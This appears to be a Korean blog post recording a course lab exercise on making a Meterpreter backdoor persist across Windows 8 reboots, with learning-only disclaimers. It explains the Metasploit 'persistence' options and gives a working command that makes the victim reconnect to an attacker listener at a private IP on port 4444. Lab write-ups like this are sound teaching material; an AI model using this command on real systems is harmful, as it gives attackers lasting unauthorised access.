[λͺ¨μ˜ ν•΄ν‚Ή] μœˆλ„μš°8 μž¬λΆ€νŒ… μ‹œ μ•…μ„±μ½”λ“œ μ‹€ν–‰

728x90
λ°˜μ‘ν˜•

! 이 포슀트의 λ‚΄μš©μ€ 전곡 κ°•μ˜μ—μ„œ 닀룬 λ¦¬λˆ…μŠ€ λ³΄μ•ˆ μ‹€μŠ΅μ˜ 기둝용이며, μ΄λŠ” ν•™μŠ΅ λͺ©μ μœΌλ‘œλ§Œ μ‚¬μš©λ˜μ–΄μ•Ό ν•©λ‹ˆλ‹€.

! μ–΄λ– ν•œ κ²½μš°μ—λ„ μ΄λŸ¬ν•œ κΈ°μˆ μ„ μ•…μš©ν•˜κ±°λ‚˜ λΆˆλ²•μ μΈ ν™œλ™μ— μ‚¬μš©ν•΄μ„œλŠ” μ•ˆ λ©λ‹ˆλ‹€.

 

! λͺ¨μ˜ ν•΄ν‚Ήκ³Ό κ΄€λ ¨λœ μ‹€μŠ΅μ€ 합법적인 ν™˜κ²½μ—μ„œλ§Œ μˆ˜ν–‰λ˜μ–΄μ•Ό ν•˜λ©°, λ¬΄λ‹¨μœΌλ‘œ λ‹€λ₯Έ μ‚¬λžŒμ˜ μ‹œμŠ€ν…œμ— μ ‘κ·Όν•˜λŠ” λ“±μ˜ ν–‰μœ„λŠ” 법적인 문제둜 μ΄μ–΄μ§ˆ 수 μžˆμŠ΅λ‹ˆλ‹€. μ΄λŸ¬ν•œ κΈ°μˆ μ„ μ‚¬μš©ν•  λ•Œμ—λŠ” 항상 윀리적인 μ±…μž„μ„ κ°–κ³  행동해야 ν•©λ‹ˆλ‹€.

 

01. Windows 8 μž¬λΆ€νŒ… μ‹œ μ•…μ„±μ½”λ“œ μ‹€ν–‰

  01-01. μž¬λΆ€νŒ… μ‹œ μ•…μ„±μ½”λ“œκ°€ 싀행될 수 μžˆλ„λ‘ λͺ…λ Ήμ–΄ μ‹€ν–‰

    - persistence λͺ…λ Ήμ–΄ μ˜΅μ…˜

 

     * 이 λͺ…λ Ήμ–΄λŠ” Meterpreter μ„Έμ…˜μ„ μ‚¬μš©ν•˜λŠ” κ³΅κ²©μžκ°€ μ‹œμŠ€ν…œμ— 백도어λ₯Ό μ„€μΉ˜ν•˜κ³  μœ μ§€ν•  수 μžˆλ„λ‘ ν•œλ‹€. μ„€μ •λœ μ˜΅μ…˜μ— 따라 Metasploit FrameworkλŠ” 지속성을 μœ μ§€ν•˜κ³  Meterpreter μ„Έμ…˜μ„ μ‚¬μš©ν•  수 μžˆλ„λ‘ μ‹œμŠ€ν…œμ— 백도어λ₯Ό μ„€μΉ˜ν•œλ‹€.

 

> run persistence -h

 

μ˜΅μ…˜ μ„€λͺ…
-U μ‚¬μš©μžκ°€ 둜그온 ν•  λ•Œ μ—μ΄μ „νŠΈ μžλ™ μ‹œμž‘
-i 각 μ—°κ²° μ‹œλ„ 간격(초))
-p Metasploit을 μ‹€ν–‰ν•˜λŠ” μ‹œμŠ€ν…œμ΄ μˆ˜μ‹ ν•˜λŠ” 포트
-r 연결을 μœ„ν•΄ 싀행쀑인 Metasploit μˆ˜μ‹ κΈ°μ˜ IP

 

    - persistence λͺ…λ Ήμ–΄ μ‹€ν–‰

> run persistence -U -i 5 -p 4444 -r 192.168.255.138

 

    -  Windows 8 reboot ν›„ μž¬μ—°κ²° 확인

 

 

λ°˜μ‘ν˜•